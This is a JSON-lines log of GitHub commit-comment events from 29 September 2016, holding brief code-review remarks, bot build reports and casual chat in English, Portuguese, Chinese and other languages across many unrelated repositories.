{"id":"4636859401","type":"CommitCommentEvent","actor":{"login":"TanSA05"},"repo":{"name":"TanSA05/OpenFarm"},"payload":{"comment":{"id":19222825,"position":14,"line":14,"path":"spec/controllers/api/api_tags_controller_spec.rb","commit_id":"67a95309b644204150e0c4362d691ac323fcffab","created_at":"2016-09-29T12:18:54Z","updated_at":"2016-09-29T12:18:54Z","body":"Okay. Editing."}},"created_at":"2016-09-29T12:18:54Z"}
{"id":"4636859831","type":"CommitCommentEvent","actor":{"login":"19majkel94"},"repo":{"name":"typeorm/typeorm.github.io"},"payload":{"comment":{"id":19222827,"position":4,"line":130,"path":"index.html","commit_id":"6124b45bd56334820bcd1664b8a69dda288b23b7","created_at":"2016-09-29T12:18:59Z","updated_at":"2016-09-29T12:18:59Z","body":"The funniest typo ever! 😆 "}},"created_at":"2016-09-29T12:18:59Z"}
{"id":"4636861675","type":"CommitCommentEvent","actor":{"login":"RobortHuan"},"repo":{"name":"RobortHuan/hello-world"},"payload":{"comment":{"id":19222829,"position":null,"line":null,"path":null,"commit_id":"ca54374789d76cd933f5d78ac2de5114457d7b2a","created_at":"2016-09-29T12:19:22Z","updated_at":"2016-09-29T12:19:22Z","body":"好"}},"created_at":"2016-09-29T12:19:22Z"}
{"id":"4636861772","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"frol/flask-restplus-server-example"},"payload":{"comment":{"id":19222830,"position":26,"line":47,"path":"flask_restplus_patched/resource.py","commit_id":"0d5faccaf0f1368c93531b9663b3531b9b1820b0","created_at":"2016-09-29T12:19:23Z","updated_at":"2016-09-29T12:19:23Z","body":"Indeed! Good catch!"}},"created_at":"2016-09-29T12:19:23Z"}
{"id":"4636862222","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19222832,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-29T12:19:28Z","updated_at":"2016-09-29T12:19:28Z","body":"master (evanweaver) - i386-Windows-7-VisualStudio-12: OK (2413 of 2619 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.13%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T12:19:28Z"}
{"id":"4636865642","type":"CommitCommentEvent","actor":{"login":"martinloeffen"},"repo":{"name":"PTPM/MTASA"},"payload":{"comment":{"id":19222838,"position":null,"line":null,"path":null,"commit_id":"6144d6be6ca979963104972d8eb5be58bb7ed980","created_at":"2016-09-29T12:20:11Z","updated_at":"2016-09-29T12:20:11Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Forum promotion from ingame](https://trello.com/c/zsZiLsHF/68-forum-promotion-from-ingame)"}},"created_at":"2016-09-29T12:20:11Z"}
{"id":"4636872691","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"frol/flask-restplus-server-example"},"payload":{"comment":{"id":19222852,"position":26,"line":47,"path":"flask_restplus_patched/resource.py","commit_id":"0d5faccaf0f1368c93531b9663b3531b9b1820b0","created_at":"2016-09-29T12:21:35Z","updated_at":"2016-09-29T12:21:35Z","body":"Fixed."}},"created_at":"2016-09-29T12:21:35Z"}
{"id":"4636872830","type":"CommitCommentEvent","actor":{"login":"apapsch"},"repo":{"name":"twigphp/Twig"},"payload":{"comment":{"id":19222853,"position":25,"line":264,"path":"lib/Twig/Loader/Filesystem.php","commit_id":"6f0e3edbc55a7ce0464fa0ec90462d66822e0750","created_at":"2016-09-29T12:21:37Z","updated_at":"2016-09-29T12:21:37Z","body":"I created PR #2152 which addresses this issue. It doesn't conflate first 3 slashes in phar URLs."}},"created_at":"2016-09-29T12:21:37Z"}
{"id":"4636879700","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19222864,"position":5,"line":1421,"path":"src/pocketmine/Player.php","commit_id":"56b7cb0d4f09af93b640d0b610479c6ea69d20a7","created_at":"2016-09-29T12:22:55Z","updated_at":"2016-09-29T12:22:55Z","body":"TODO: find out what this actually is (no idea if it actually made any difference)"}},"created_at":"2016-09-29T12:22:55Z"}
{"id":"4636882446","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19222875,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T12:23:26Z","updated_at":"2016-09-29T12:23:26Z","body":"不是，我说的仅仅是DSL代码，没说DSL引擎。"}},"created_at":"2016-09-29T12:23:26Z"}
{"id":"4636883832","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19222878,"position":null,"line":null,"path":null,"commit_id":"eabb10fe13187db2541d6b24ba3f8b83cfb6820e","created_at":"2016-09-29T12:23:42Z","updated_at":"2016-09-29T12:23:42Z","body":"Oi,\r\n\r\nNão precisa colocar todos os nomes dos métodos na mensagem do commit. Pode deixar algo mais genérico e claro tipo: \"adicionar testes para perderVida e getNumeroSorte.\""}},"created_at":"2016-09-29T12:23:42Z"}
{"id":"4636887505","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19222887,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T12:24:26Z","updated_at":"2016-09-29T12:24:26Z","body":"感觉国内访问 AWS 还是太让人纠结了，之前一次我在 Github 下载，速度只有 5 kb/s，基本等于没速度、、、\r\n\r\n说到宽带，我这里移动光宽带 50M 上行 20M，价格也优惠，访问外网好像也还不错，电信和联通都有 DNS\r\n劫持（劫持还修改了hosts），貌似移动无劫持。\r\n\r\naofall <notifications@github.com>于2016年9月29日周四 下午6:45写道：\r\n\r\n> AWS就应该用上Anycast避免这个问题.......\r\n> 之前说打不开大部分应该是移动用户，这么长时间了部分IP稍有变动也很正常，更新一下就好了\r\n> 至于指定IP对于电信用户是没有影响的（想办法要来了邻居的WiFi密码便有了移动电信双线嘻嘻嘻\r\n>\r\n> —\r\n> You are receiving this because you were mentioned.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/racaljk/hosts/commit/026d52fab9728f311b8edabaf8a4b598d207f5a7#commitcomment-19221844>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AHE3421LNYw0Ozy0YTFs3GjZknHxswPxks5qu5bfgaJpZM4KJ1wK>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-29T12:24:26Z"}
{"id":"4636887966","type":"CommitCommentEvent","actor":{"login":"Natureshadow"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19222888,"position":null,"line":null,"path":null,"commit_id":"ba9add46a9fda6b98aac2d4ccf426a9cd96fea02","created_at":"2016-09-29T12:24:32Z","updated_at":"2016-09-29T12:24:32Z","body":"OK, great!"}},"created_at":"2016-09-29T12:24:32Z"}
{"id":"4636888842","type":"CommitCommentEvent","actor":{"login":"Natureshadow"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19222890,"position":null,"line":null,"path":null,"commit_id":"ba9add46a9fda6b98aac2d4ccf426a9cd96fea02","created_at":"2016-09-29T12:24:43Z","updated_at":"2016-09-29T12:24:43Z","body":"Maybe you want to update usage in README.md as well ;)"}},"created_at":"2016-09-29T12:24:43Z"}
{"id":"4636891055","type":"CommitCommentEvent","actor":{"login":"mef"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19222898,"position":64,"line":136,"path":"view/barChart.js","commit_id":"fb03c6cc476cca120852f174de2898baf92c46aa","created_at":"2016-09-29T12:25:13Z","updated_at":"2016-09-29T12:25:13Z","body":"> // TODO Why oh why do I have to do this twice???\r\n\r\nThis is because in the first call, you insert the new data, with opacity 0.\r\n\r\nIn the second function call, you bind the same data, so it gets assigned to the update selection, where you apply some opacity."}},"created_at":"2016-09-29T12:25:13Z"}
{"id":"4636896089","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222909,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T12:26:17Z","updated_at":"2016-09-29T12:26:17Z","body":"check my sepolicy repo, i had to fix rules here too."}},"created_at":"2016-09-29T12:26:17Z"}
{"id":"4636896604","type":"CommitCommentEvent","actor":{"login":"jinhoyim"},"repo":{"name":"jinhoyim/FDS"},"payload":{"comment":{"id":19222911,"position":null,"line":null,"path":null,"commit_id":"8c8b83fd24a25277a1d427763fb3a7bccd9b524c","created_at":"2016-09-29T12:26:24Z","updated_at":"2016-09-29T12:26:24Z","body":"파일 정리 및 추가"}},"created_at":"2016-09-29T12:26:24Z"}
{"id":"4636898196","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19222918,"position":20,"line":21,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"bb83ce5fa1e1448fba18ba814b249e8c5cc48ede","created_at":"2016-09-29T12:26:44Z","updated_at":"2016-09-29T12:26:44Z","body":"Podes tentar unificar o return em uma linha só."}},"created_at":"2016-09-29T12:26:44Z"}
{"id":"4636900992","type":"CommitCommentEvent","actor":{"login":"rjmunro"},"repo":{"name":"nodejs/docker-node"},"payload":{"comment":{"id":19222926,"position":24,"line":24,"path":"docs/BestPractices.md","commit_id":"0e0c74ad89870df855ecb8fa4e440c1bf030a0e3","created_at":"2016-09-29T12:27:20Z","updated_at":"2016-09-29T12:27:20Z","body":"@retrohacker Can you not add `USER app` to the Dockerfile? (like in this example: http://jdlm.info/articles/2016/03/06/lessons-building-node-app-docker.html), or is there some disadvantage to doing that?"}},"created_at":"2016-09-29T12:27:20Z"}
{"id":"4636901333","type":"CommitCommentEvent","actor":{"login":"sukalemanoj"},"repo":{"name":"sukalemanoj/design"},"payload":{"comment":{"id":19222927,"position":216,"line":216,"path":"sticky-footer - Copy.html","commit_id":"2ae1c8fd1f6998240fab05083f6a3d163903925a","created_at":"2016-09-29T12:27:24Z","updated_at":"2016-09-29T12:27:24Z","body":"please comiit"}},"created_at":"2016-09-29T12:27:24Z"}
{"id":"4636902360","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19222931,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"12cb828f5d96010fcf6735d985473b8ebded054c","created_at":"2016-09-29T12:27:36Z","updated_at":"2016-09-29T12:27:36Z","body":"Por enquanto é importante seguir as regras de codificação que viemos aplicando: coloca a implementação do método na linha debaixo."}},"created_at":"2016-09-29T12:27:36Z"}
{"id":"4636902377","type":"CommitCommentEvent","actor":{"login":"TanSA05"},"repo":{"name":"TanSA05/OpenFarm"},"payload":{"comment":{"id":19222932,"position":9,"line":9,"path":"spec/controllers/api/api_tags_controller_spec.rb","commit_id":"67a95309b644204150e0c4362d691ac323fcffab","created_at":"2016-09-29T12:27:37Z","updated_at":"2016-09-29T12:27:37Z","body":"Resolved."}},"created_at":"2016-09-29T12:27:37Z"}
{"id":"4636902533","type":"CommitCommentEvent","actor":{"login":"amitmutrezas"},"repo":{"name":"inesmartins/e-learning_platform--AngularJS"},"payload":{"comment":{"id":19222933,"position":null,"line":null,"path":null,"commit_id":"7de307b5d4c1e0d24f075dee0cb04609034db8eb","created_at":"2016-09-29T12:27:39Z","updated_at":"2016-09-29T12:27:39Z","body":"Hi\r\n\r\nI want to use this project as a reference but unable to run it in my browser.\r\nI cloned this project and opened index.html in the browser.\r\n\r\nIs there anything I need to do?"}},"created_at":"2016-09-29T12:27:39Z"}
{"id":"4636904109","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19222936,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:27:58Z","updated_at":"2016-09-29T12:27:58Z","body":"dfgdfgdfg"}},"created_at":"2016-09-29T12:27:58Z"}
{"id":"4636905213","type":"CommitCommentEvent","actor":{"login":"sukalemanoj"},"repo":{"name":"sukalemanoj/design"},"payload":{"comment":{"id":19222938,"position":254,"line":254,"path":"sticky-footer - Copy.html","commit_id":"2ae1c8fd1f6998240fab05083f6a3d163903925a","created_at":"2016-09-29T12:28:11Z","updated_at":"2016-09-29T12:28:11Z","body":"please"}},"created_at":"2016-09-29T12:28:11Z"}
{"id":"4636906478","type":"CommitCommentEvent","actor":{"login":"glehmann"},"repo":{"name":"click-contrib/click-spinner"},"payload":{"comment":{"id":19222940,"position":null,"line":null,"path":null,"commit_id":"f7758994df1012491ce29e1c2e2d8a1e3be707df","created_at":"2016-09-29T12:28:26Z","updated_at":"2016-09-29T12:28:26Z","body":"Any chance to upload this to pypi soon?\r\nMy application needs to work with both python 2 and 3, so I can't use your lib without this fix!"}},"created_at":"2016-09-29T12:28:26Z"}
{"id":"4636906888","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19222942,"position":19,"line":20,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"bb83ce5fa1e1448fba18ba814b249e8c5cc48ede","created_at":"2016-09-29T12:28:32Z","updated_at":"2016-09-29T12:28:32Z","body":"Cuidado com o português: o correto é bissexto, e não bissesto."}},"created_at":"2016-09-29T12:28:32Z"}
{"id":"4636907070","type":"CommitCommentEvent","actor":{"login":"Phoenix616"},"repo":{"name":"Phoenix616/ChestShopNotifier"},"payload":{"comment":{"id":19222943,"position":null,"line":null,"path":null,"commit_id":"eb0a2b77a7d9350249acc49ae29573c20b618737","created_at":"2016-09-29T12:28:34Z","updated_at":"2016-09-29T12:28:34Z","body":"Well I'm running my own version (which is a fork of sgdc3's fork) but I wanted to look into dmulloy2's fork. If it has the same fixes I might use it too.\r\n\r\nFor this plugin I want to keep compatibility with the main version (as most people will probably download it from the bukkit dev page) I'm not sure yet where this current incompatibility originated from but I intend to get rid of it."}},"created_at":"2016-09-29T12:28:34Z"}
{"id":"4636907290","type":"CommitCommentEvent","actor":{"login":"emartynov"},"repo":{"name":"Glucosio/glucosio-android"},"payload":{"comment":{"id":19222945,"position":12,"line":459,"path":"app/src/main/res/values/strings.xml","commit_id":"d5c8d396a15a71a60415fe27b417e6b7dcd4fc67","created_at":"2016-09-29T12:28:37Z","updated_at":"2016-09-29T12:28:37Z","body":"Evening!"}},"created_at":"2016-09-29T12:28:37Z"}
{"id":"4636914121","type":"CommitCommentEvent","actor":{"login":"jwt625"},"repo":{"name":"SM-at-THU/StatisticalMechanics"},"payload":{"comment":{"id":19222957,"position":null,"line":null,"path":null,"commit_id":"580df5e4a6f1b476b6bc648449fc0733e53e7582","created_at":"2016-09-29T12:30:02Z","updated_at":"2016-09-29T12:30:02Z","body":"What's this 2333"}},"created_at":"2016-09-29T12:30:02Z"}
{"id":"4636915036","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19222961,"position":4,"line":13,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"fee3a742f811ce1ff8682f379b447fa941fee31b","created_at":"2016-09-29T12:30:11Z","updated_at":"2016-09-29T12:30:11Z","body":"cuidado com a pequena duplicação que foi gerada com o construtor acima."}},"created_at":"2016-09-29T12:30:11Z"}
{"id":"4636919078","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19222966,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:30:57Z","updated_at":"2016-09-29T12:30:57Z","body":"fgdfgsdfg"}},"created_at":"2016-09-29T12:30:57Z"}
{"id":"4636919890","type":"CommitCommentEvent","actor":{"login":"sgandon"},"repo":{"name":"Talend/components"},"payload":{"comment":{"id":19222967,"position":24,"line":193,"path":"components-filedelimited/src/main/java/org/talend/components/filedelimited/runtime/FileDelimitedAvroRegistry.java","commit_id":"3f9746d02a121806e896e98d1e520566b2274878","created_at":"2016-09-29T12:31:07Z","updated_at":"2016-09-29T12:31:07Z","body":"indeed :D"}},"created_at":"2016-09-29T12:31:07Z"}
{"id":"4636924993","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19222978,"position":16,"line":26,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"fee3a742f811ce1ff8682f379b447fa941fee31b","created_at":"2016-09-29T12:32:07Z","updated_at":"2016-09-29T12:32:07Z","body":"dá pra deixar um pouquinho mais \"simples\":\r\n\r\n```Java\r\nelse if(!dataNascimento.ehBissesto() && (nome == \"Seixas\" || nome == \"Meireles\"))\r\n```"}},"created_at":"2016-09-29T12:32:07Z"}
{"id":"4636926527","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19222982,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T12:32:26Z","updated_at":"2016-09-29T12:32:26Z","body":"那看到了，C#在手表示有点羡慕了~_~"}},"created_at":"2016-09-29T12:32:26Z"}
{"id":"4636927260","type":"CommitCommentEvent","actor":{"login":"pleerock"},"repo":{"name":"typeorm/typeorm.github.io"},"payload":{"comment":{"id":19222985,"position":4,"line":130,"path":"index.html","commit_id":"6124b45bd56334820bcd1664b8a69dda288b23b7","created_at":"2016-09-29T12:32:36Z","updated_at":"2016-09-29T12:32:36Z","body":"haha yeah"}},"created_at":"2016-09-29T12:32:36Z"}
{"id":"4636928801","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19222989,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:32:55Z","updated_at":"2016-09-29T12:32:55Z","body":"gdfsgdfgfdsg"}},"created_at":"2016-09-29T12:32:55Z"}
{"id":"4636928919","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19222990,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T12:32:56Z","updated_at":"2016-09-29T12:32:56Z","body":"还有一个Demo2。这个是个Flappy bird。"}},"created_at":"2016-09-29T12:32:56Z"}
{"id":"4636929553","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"Dreams-N/android_vendor_ds"},"payload":{"comment":{"id":19222991,"position":null,"line":null,"path":null,"commit_id":"0601d503f9cb64cea2f954e5c61bc1ab7ac053b5","created_at":"2016-09-29T12:33:04Z","updated_at":"2016-09-29T12:33:04Z","body":"Use \"@\", so that i know,you have thanked me lol!"}},"created_at":"2016-09-29T12:33:04Z"}
{"id":"4636937527","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223008,"position":50,"line":50,"path":"static/js/services/tasks.js","commit_id":"79b55a9d584e4f774cf3e163da09deadb24d0de7","created_at":"2016-09-29T12:34:43Z","updated_at":"2016-09-29T12:34:43Z","body":"Seems odd to me that this listener is set up in the `getTasks()` function, rather than its own more suitably-named function."}},"created_at":"2016-09-29T12:34:43Z"}
{"id":"4636944931","type":"CommitCommentEvent","actor":{"login":"sielay"},"repo":{"name":"IonicaBizau/medium-editor-markdown"},"payload":{"comment":{"id":19223022,"position":4,"line":3,"path":"package.json","commit_id":"e050380b53ffb68e3e64a0228889cbd37df35436","created_at":"2016-09-29T12:36:14Z","updated_at":"2016-09-29T12:36:14Z","body":"@IonicaBizau I think you forgot to push it npm"}},"created_at":"2016-09-29T12:36:14Z"}
{"id":"4636945253","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223023,"position":50,"line":50,"path":"static/js/services/tasks.js","commit_id":"79b55a9d584e4f774cf3e163da09deadb24d0de7","created_at":"2016-09-29T12:36:18Z","updated_at":"2016-09-29T12:36:18Z","body":"It might just be that `getTasks` is not the best name."}},"created_at":"2016-09-29T12:36:18Z"}
{"id":"4636946430","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"OtavioBubans/crescer-2016-2"},"payload":{"comment":{"id":19223029,"position":2,"line":2,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"00e8e53f350d8623c157fab7002f2d78aea32647","created_at":"2016-09-29T12:36:33Z","updated_at":"2016-09-29T12:36:33Z","body":"Cuida o nome da classe. O cliente pediu que fosse `Dwarf`."}},"created_at":"2016-09-29T12:36:33Z"}
{"id":"4636947176","type":"CommitCommentEvent","actor":{"login":"evgenyadev"},"repo":{"name":"evgenyadev/ChildControl"},"payload":{"comment":{"id":19223031,"position":8,"line":22,"path":"app/src/main/java/com/example/invisible/childcontrol/system/HTTPHelper.java","commit_id":"13c756c1e5048dfbd9816064727b15e493f2a09a","created_at":"2016-09-29T12:36:43Z","updated_at":"2016-09-29T12:36:43Z","body":"// TODO: Добавить проверку доступа к инету"}},"created_at":"2016-09-29T12:36:43Z"}
{"id":"4636952400","type":"CommitCommentEvent","actor":{"login":"amirgon"},"repo":{"name":"Kilay/node-http-ntlm"},"payload":{"comment":{"id":19223044,"position":7,"line":76,"path":"httpntlm.js","commit_id":"0cfd6a5aad3be77c8f92cd6b256938c5b768431d","created_at":"2016-09-29T12:37:48Z","updated_at":"2016-09-29T12:37:48Z","body":"Why do you return `callback(callback)`??"}},"created_at":"2016-09-29T12:37:48Z"}
{"id":"4636960265","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19223064,"position":29,"line":29,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"ea60f5328d7dbd0e794e2378698899567ceff690","created_at":"2016-09-29T12:39:23Z","updated_at":"2016-09-29T12:39:23Z","body":"Percebe que em vários condições você faz a mesma coisa \"return = false\".\r\n\r\nTente remover essa duplicação simplificando e unificando as condições."}},"created_at":"2016-09-29T12:39:23Z"}
{"id":"4636965231","type":"CommitCommentEvent","actor":{"login":"josehilera"},"repo":{"name":"WilcoFiers/auto-wcag"},"payload":{"comment":{"id":19223079,"position":null,"line":null,"path":null,"commit_id":"934edd172b416367584008ff4ee5af09d058bed1","created_at":"2016-09-29T12:40:22Z","updated_at":"2016-09-29T12:40:22Z","body":"Following the comment of cpandhi about \"Environment\", maybe this property could be used when the rule is applied not to web pages, but to other non-web documents, as PDF or software programs, in line with the W3C Working Note: \"Guidance on Applying WCAG 2.0 to Non-Web Information and Communications Technologies (WCAG2ICT)\": https://www.w3.org/TR/wcag2ict/.\r\n\r\nAbout Test results, the EARL vocabulary defines: Fail, Pass, Not Aplicable, Cannot tell, Non tested. Could be used some of them and extend it with other as warning, rquired manual test, etc.\r\n\r\nI think that the template could include a property about the location of the fail, in case of fail. The EARL vocabulary suggest the use of pointer, as this concept is defined in the W3C Pointer Methods TR (https://www.w3.org/TR/Pointers-in-RDF), that offers several ways to describe the location of a fail. For example as line+char, but it could not work in case of testing over DOM instead source code. Maybe could be used the ID of the HTML tag...."}},"created_at":"2016-09-29T12:40:22Z"}
{"id":"4636965517","type":"CommitCommentEvent","actor":{"login":"manolo"},"repo":{"name":"vaadin/vaadin-grid"},"payload":{"comment":{"id":19223080,"position":14,"line":24,"path":"vaadin-grid-column-group.html","commit_id":"9ff35152b64dbef179202301fc7d1650aae65e66","created_at":"2016-09-29T12:40:25Z","updated_at":"2016-09-29T12:40:25Z","body":"Something is wrong in this code. Why do you compute headerTemplates, if you don't use it ?"}},"created_at":"2016-09-29T12:40:25Z"}
{"id":"4636967536","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223084,"position":5,"line":179,"path":"templates/partials/contacts_content.html","commit_id":"b1d75cc6558aa01ca8c6c746e895226988c1f75c","created_at":"2016-09-29T12:40:50Z","updated_at":"2016-09-29T12:40:50Z","body":"Should this be an `ng-show`?  I have a feeling this might not get re-evaluated if you viewed e.g. a `district_hospital` and _then_ a `person`... but I can't think of any user who would currently be able to do that without also having `RulesEngine.enabled` as `true`."}},"created_at":"2016-09-29T12:40:50Z"}
{"id":"4636973842","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19223096,"position":16,"line":40,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"e48e418b1a17dcee664dabe2fa15898188a601a1","created_at":"2016-09-29T12:42:06Z","updated_at":"2016-09-29T12:42:06Z","body":"Pode puxar esse if da linha 40 para junto do if da linha de cima em uma condição &&, não?"}},"created_at":"2016-09-29T12:42:06Z"}
{"id":"4636975343","type":"CommitCommentEvent","actor":{"login":"19majkel94"},"repo":{"name":"typeorm/typeorm-routing-controllers-extensions"},"payload":{"comment":{"id":19223098,"position":158,"line":158,"path":"README.md","commit_id":"fe70f100fb86ad425b0795a9de3ba96f36b8e0a5","created_at":"2016-09-29T12:42:24Z","updated_at":"2016-09-29T12:42:24Z","body":"CTRL+C, CTRL+V 😜 "}},"created_at":"2016-09-29T12:42:24Z"}
{"id":"4636977037","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19223103,"position":20,"line":44,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"e48e418b1a17dcee664dabe2fa15898188a601a1","created_at":"2016-09-29T12:42:44Z","updated_at":"2016-09-29T12:42:44Z","body":"podes fazer as duas linhas em uma:\r\n\r\n```Java\r\nnumeroSorte = numeroSorte * 33 % 100;\r\n```"}},"created_at":"2016-09-29T12:42:44Z"}
{"id":"4636977537","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223106,"position":5,"line":179,"path":"templates/partials/contacts_content.html","commit_id":"b1d75cc6558aa01ca8c6c746e895226988c1f75c","created_at":"2016-09-29T12:42:50Z","updated_at":"2016-09-29T12:42:50Z","body":"Ahh I suspect this is a non-issue as the controller is probably(?) re-initialised when a different contact is viewed."}},"created_at":"2016-09-29T12:42:50Z"}
{"id":"4636981548","type":"CommitCommentEvent","actor":{"login":"OlgaMindrik"},"repo":{"name":"OlgaMindrik/SenlaJavaTraningMindrikOlga"},"payload":{"comment":{"id":19223116,"position":null,"line":null,"path":null,"commit_id":"37682302b6f93505faed7565c95a37b001270204","created_at":"2016-09-29T12:43:39Z","updated_at":"2016-09-29T12:43:39Z","body":"1"}},"created_at":"2016-09-29T12:43:39Z"}
{"id":"4636981638","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19223117,"position":17,"line":101,"path":"tests/src/testgen/gen.R","commit_id":"47fa5260e7c819e087a70f483ff2a4ca96b98c49","created_at":"2016-09-29T12:43:40Z","updated_at":"2016-09-29T12:43:40Z","body":"No, I mean `set.seed(1)`. The random number generator is session-scoped, it is not specific to one environment or another."}},"created_at":"2016-09-29T12:43:40Z"}
{"id":"4636984067","type":"CommitCommentEvent","actor":{"login":"jessedearing"},"repo":{"name":"mercul3s/mercedescoyle.com-jekyll"},"payload":{"comment":{"id":19223122,"position":12,"line":15,"path":"blog/_posts/2016-09-25-building-a-1u-home-datacenter-hardware-and-os.md","commit_id":"e791dac05bf82babc55c65659cb2742a6e49362e","created_at":"2016-09-29T12:44:08Z","updated_at":"2016-09-29T12:44:08Z","body":"Did you mean hodgepodge?"}},"created_at":"2016-09-29T12:44:08Z"}
{"id":"4636985020","type":"CommitCommentEvent","actor":{"login":"Narumato"},"repo":{"name":"JFDuval/flexsea-plan"},"payload":{"comment":{"id":19223125,"position":null,"line":null,"path":null,"commit_id":"823e428510ea4b6470f5a69345e362ce2c8681f7","created_at":"2016-09-29T12:44:20Z","updated_at":"2016-09-29T12:44:20Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test](https://trello.com/c/rB2wlCJ3/1-test)"}},"created_at":"2016-09-29T12:44:20Z"}
